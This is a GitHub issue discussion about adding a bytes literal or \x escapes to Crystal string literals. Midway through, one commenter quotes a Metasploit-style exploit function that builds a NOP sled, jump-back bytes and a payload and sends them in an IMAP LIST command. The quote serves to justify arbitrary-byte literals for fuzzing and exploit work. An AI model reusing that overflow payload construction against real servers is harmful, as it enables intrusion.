Open asterite opened 8 years ago
I would tend towards 2 with something like https://github.com/crystal-lang/crystal/pull/2791#issuecomment-225299043 as the preferred alternative. Either way we need to make sure to not run into issues similar to #2485.
Same here: Slice(UInt8) is the de-facto type for binary data whereas String may only contain UTF-8 data. I don't think it's a good idea to push the idea that it's okay to put arbitrary bytes into a String.
inspecting a string with non-valid codepoints will output \x... for those values
But I like that.
One issue we found the other day is that we needed to do a POST in the http client with binary data. We made it work by simply creating a String with that data and then invoking HTTP::Client.post. I think I like that, it's pretty convenient. Otherwise we'd need to add overloads or restrictions for Slice(UInt8), and HTTP::Request will have the body as String | Slice(UInt8), etc.
To compare with other statically typed languages, Go's strings are also just byte chunks that can hold arbitrary bytes, but can also be treated as UTF-8 strings when needed: https://blog.golang.org/strings
Java's String class is supposed to be UTF-16, but can hold arbitrary bytes as well.
I very much like that String is supposed to handle valid UTF-8 data and operations on that. And nothing else. I would hate to lose that property and would rather have convenience APIs added to other interfaces for handling Slice(UInt8). In the HTTP example binary data would need some form of content encoding to valid ASCII values anyway. Detecting whether to do that encoding automatically upon receiving a Slice(UInt8) vs a String actually seems easier than always second-guessing whether a String needs it or not.
I am with @jhass here. I would keep String as valid UTF-8.
I would rather add overloads in the http client to send/receive blobs. And I definitely want to be able to embed binary resources (Slice or StaticArray and then a convenient api to wrap it)
Would it be helpful or more performant to have Base64.decode(str, io) : Nil so I can decode the asset and stream it out with the response?
@mperham Good idea, an overload that writes directly to an IO is missing. Should be easy to add.
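For readers arriving later: recent Crystal releases do ship a Base64.decode overload that takes an IO. A minimal sketch of how streaming a decoded asset might look is below; the IO::Memory stands in for an HTTP response, and the encoded string is made up for illustration.

```crystal
require "base64"

# Hypothetical embedded asset: "hello" encoded as Base64.
encoded = "aGVsbG8="

# IO::Memory stands in for a response body or any other IO.
io = IO::Memory.new

# Decode straight into the IO instead of allocating an intermediate Slice.
Base64.decode(encoded, io)

puts io.to_s # hello
```

Whether this is measurably faster than decoding to a Slice first depends on the asset size; it mainly avoids holding a second copy of the decoded data.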
Just a side note, I'm trying to write the Slice(UInt8) out to the Kemal response:
def self.serve(filename, resp)
  resp.status_code = 200
  resp.write Base64.decode(WEB_ASSETS[filename])
end
I verified that the Slice size is exactly the same size as the file on disk but the response only has about half the expected bytes. Anyone know why the server response is not writing the entire Slice to the client?
@mperham we'd probably need a concrete code that we can reproduce to check if something works wrong. I tried creating a slice of 5000~50000 bytes and it works well.
Looks like the problem is related to me not setting the content-type header. The browser prints out the PNG contents as text/html but serves it correctly when I set it to "application/octet-stream".
Just throwing thoughts in to the mixture here: How about a literal that generates a View(UInt8) which would be a read only type derived from Slice(UInt8)? If it's known at compile time an area is unwritable, we should be helped at compile time, avoiding a crash where possible.
How about letting users create their own literal types (maybe in %data{ ... } format, where data can be any word for each type, and {} can be [] or ()) like C++11 does?
Then we can create some custom literals for Slice(UInt8), StaticArray(UInt8) or other types we want? (Maybe use macros to define these at compile time?)
Any progress on this? Usecase in my scenario is writing bytes to an IO, as one might do when using low level packets on the wire. io.write_bytes(0x00000000, IO::ByteFormat::BigEndian) doesn't provide 4 empty bytes as one might expect, but rather outputs a single empty byte.
@maxpowa It works for me 😕
io = IO::Memory.new
io.write UInt8.slice(1, 1, 1, 1, 1, 1, 1, 1)
io.rewind
io.write_bytes(0x00000000, IO::ByteFormat::BigEndian)
io.to_slice # Bytes[0, 0, 0, 0, 1, 1, 1, 1]
Yep nevermind, it is indeed working... I must have done something wrong when I was testing. Thanks @Exilor
We can add back the \x... escape to string literals
This has been implemented in https://github.com/crystal-lang/crystal/commit/cd8296b88d7859b8f914a0d4bf55f7c5534c5b15, by the way.
I think it's a really bad idea to allow broken string literals in the language's core syntax. I noticed that some people are already doing hideous things with it, without really understanding the situation...
This should only be possible through an unsafe operation.
The alternative solution is the way to go. Bytes literals should definitely be a thing.
And "\xff" syntax should give an explicit error like "strings are for UTF-8 encoded text, not for arbitrary bytes".
Side note: in Python "\x**" means "\u{**}", but they do have bytes literals where it means what you'd expect: b'\xff'
@oprypin but sometimes people need to do hideous things for hideous causes :) this feature is important, it's heavily relied on in fuzzers and exploit development (yes FFS using Crystal ! :) ) https://www.offensive-security.com/metasploit-unleashed/shell/
def exploit
  connected = connect_login
  nopes = "\x90"*(payload_space-payload.encoded.length) # to be fixed with make_nops()
  sjump = "\xEB\xF9\x90\x90" # Jmp Back
  njump = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby ;)
  evil = nopes + payload.encoded + njump + sjump + [target.ret].pack("A3")
  print_status("Sending payload")
  sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
  sock.put(sploit)
  handler
  disconnect
end
etc....
It's still easy enough to construct a string with invalid data, I just don't think it should be part of the syntax.
@bararchy, thanks for a good demonstration of the point I was making... All of these should have been Bytes
I forgot that this issue existed and just started writing a new one. Anyway... I'm just still appalled that there's a literal for invalid strings.
So, ping
Putting bytes literals in read-only data is a must-have, and so if the literal produces a writable Slice(UInt8), that's a problem. Or it used to be, not anymore! Now we even have read-only slices.
So there are really no blockers now.
Right now this is solved because one can use a String for this, because a String can now have arbitrary bytes.
I know it's not the most elegant solution, but for now it works. We can postpone a real solution for this for later.
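As an illustration of that workaround, here is a minimal sketch; the byte values are arbitrary and chosen only so that the string is not valid UTF-8.

```crystal
# A string literal with \x escapes can hold bytes that are not valid UTF-8.
payload = "\xFF\x01\x90"

puts payload.bytesize        # 3
puts payload.valid_encoding? # false (0xFF can never appear in UTF-8)

# String#to_slice gives a byte view of the string without copying.
bytes = payload.to_slice
puts bytes.read_only? # true
puts bytes.to_a       # [255, 1, 144]
```

The slice is flagged read-only, so the literal's bytes cannot be modified through it by accident.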
pls
What if we add:
b"some content"
For now that would be equivalent to:
"some content".to_slice
and of course you can use \xAB for specific byte values.
We could also have:
b'x'
to be the same as 'x'.ord.to_u8 and not have it compile if it doesn't fit in an UInt8, so that would be a byte literal.
I think Rust uses the same notation.
My suggestion that I started to write:
It would be a literal that does not allow \u escapes, and allows only ASCII characters, supplemented by the \xff syntax for arbitrary bytes. The literal would produce Slice(UInt8).
I propose the syntax b"foo\x12fsdfg", like in Python and Rust.
Side note, Bytes[] macro probably should be rewritten to produce a literal.
I would also suggest removing the hexadecimal notation from strings. Obviously, to replace the use case, the bytes literal would need to store the data in the read-only data section. I don't know whether that means that the size of the slice would need to be moved there as well, like it is with strings.
"some content".to_slice is impossible to do if hexadecimal escapes are removed from strings, which is the main problem I have
Oh, with "some content".to_slice I meant it would be equivalent to that. We could probably type b"hello" as a read-only Slice(UInt8) and put that in the ROM section of the program.
For that we'll probably need Slice to be part of the known types for the compiler, and have @pointer, @size and @read_only laid out accordingly in memory.
But for now I'd leave the ability to have \x.. escape sequences in a String. Later we can remove them, but we'll have to make sure that there's no way to create strings that are not valid in UTF-8. Maybe that will slow down everything a bit, but, well, correct code is better than fast code.
@pointer, @size and @read_only could be directly followed by the data itself, with @pointer being equal to its own address + offset.
I don't think it's that important to prevent strings that are not valid UTF-8. The only way to create them is String.new(bytes or pointer), just raise the awareness. The problem is that people see nothing wrong with '\x' string literals and then intentionally seek out a way to recreate such strings "programmatically".
@asterite We wouldn't need to know about Slice's internal layout, unlike String, because we can simply define that Slice needs to have a constructor taking a pointer and a size (which we already have). We only need to know String's layout because we put the data contiguously. With Slice we don't need to do that. And it's probably not worth doing it since it's a struct and LLVM will optimize since both the constructor arguments are literals.
@RX14, are you sure you understand the part about putting this in read-only data section?
@oprypin yes.... you pass a pointer to the data in the RO section to the slice constructor. The slice instance itself has to live on the stack anyway, so can't be in ROdata.
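A rough sketch of that idea in today's Crystal, for illustration only: a string literal's bytes stand in for the data the compiler would emit for a bytes literal, and the existing Slice constructor wraps them. This is not how a real literal would be compiled.

```crystal
# Stand-in for compiler-emitted constant data: a string literal's bytes.
source = "\xDE\xAD\xBE\xEF"

# Wrap pointer + size in a Slice struct, flagged read-only.
bytes = Slice.new(source.to_unsafe, source.bytesize, read_only: true)

puts bytes.size # 4
puts bytes[0]   # 222

# Writes through a read-only slice are rejected at runtime.
write_rejected = false
begin
  bytes[0] = 0_u8
rescue
  write_rejected = true
end
puts write_rejected # true
```

Only the data needs to be constant; the Slice value itself is an ordinary struct holding a pointer, a size and the read-only flag.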
@RX14 Please reopen this
Why was this even closed and all those other issues which are most definitely not fixed?
I would go one step further and use a completely new syntax similar to Elixir's bitstrings, rather than simply borrowing the one for string literals:
<<0x12>> # => <<0x12>>
<<0x21>> # => "!"
<<0xCF, 0x83>> # => "σ"
"\xCF\x83" # => "σ"
<<0x12, 0xCF, 0x83>> # => <<0x12, 0xCF, 0x83>>
"\x12\xCF\x83" # => <<0x12, 0xCF, 0x83>>
<<0x12, "σ">> # => <<0x12, 0xCF, 0x83>>
(Every double-quoted string literal in Elixir denotes a bitstring. Single-quoted ones produce charlists.)
An attractive feature about them is they can handle multibyte sequences:
<<0x12345678::32>> # => <<18, 52, 86, 120>>
<<0x12345678::32-little>> # => <<120, 86, 52, 18>>
<<1.0::little>> # => <<0, 0, 0, 0, 0, 0, 240, 63>>
<<1.0::32-little>> # => <<0, 0, 128, 63>>
<<0xCF83::16>> # => "σ"
<<0x83CF::16-little>> # => "σ"
<<"σ"::utf8>> # => "σ"
<<"σ"::utf16-little>> # => <<195, 3>>
<<0x03C3::utf8>> # => "σ"
<<0x03C3::utf16-big>> # => <<3, 195>>
It emphasizes the fact that byte arrays are a more general concept than string-like byte sequences.
It is important that both the Bytes itself and the data it refers to are stored in read-only memory; the Slice constructor that accepts a pointer is unsafe, so the data must be encapsulated behind a read-only Bytes, with no other way to access it.
If we have an extremely fast String#valid_encoding?, say even faster than #each_char(&), then the performance penalties should be very minimal. So as a starter I think we should incorporate one of the algorithms in #11873. (In fact, the standard library has never used that method since its introduction.)
Just to throw yet another idea in:
Ruby has the .b method for strings.
https://docs.ruby-lang.org/en/3.2/String.html#method-i-b
Maybe "bytestring\x00\x01".b could be treated as a byteslice literal in Crystal?
(I prefer to say "a ByteSlice" rather than "a Bytes".)
Ruby also has ?… for character literals (or rather single-character strings), even supporting control characters.
https://docs.ruby-lang.org/en/3.2/syntax/literals_rdoc.html#label-Strings
?\C-g == ?\a # => true
Then again, b"…" and b'…' or Elixir bitstrings are probably better, if they could maybe use b(…) or b[…] or %b(…) instead of <<…>>, provided they let you write things like:
b( "filemagic", 0x01, 0x02, '\a', '\C-g' )
We need a way to express binary data embedded in the data section of the program. We can do this right now for strings, but there's no way to create a non-UTF8 string with a string literal.
There are several ways we can fix this:
1. We can add back the \x... escape to string literals, to add a byte with a specific hexadecimal value. Right now strings can hold non-UTF8 data, they just raise when using those strings as UTF-8 data (for example, iterating them), so it's strange that they can hold non-UTF8 data but one can't create them with a literal. From there, one could take a slice. This will also solve #2565 because inspecting a string with non-valid codepoints will output \x... for those values.
2. Add a literal for Slice(UInt8). It could just be Slice(UInt8), but these are not read-only. Or maybe they can be read-only and they can crash the program when written. One shouldn't write them, the same way as one doesn't get a slice from a string literal and write to it. There was the idea of introducing const [...] for this, with which we could create static data for any kind of integer value.
This doesn't have a big priority right now, but I'm leaving it here so there's a place to discuss this.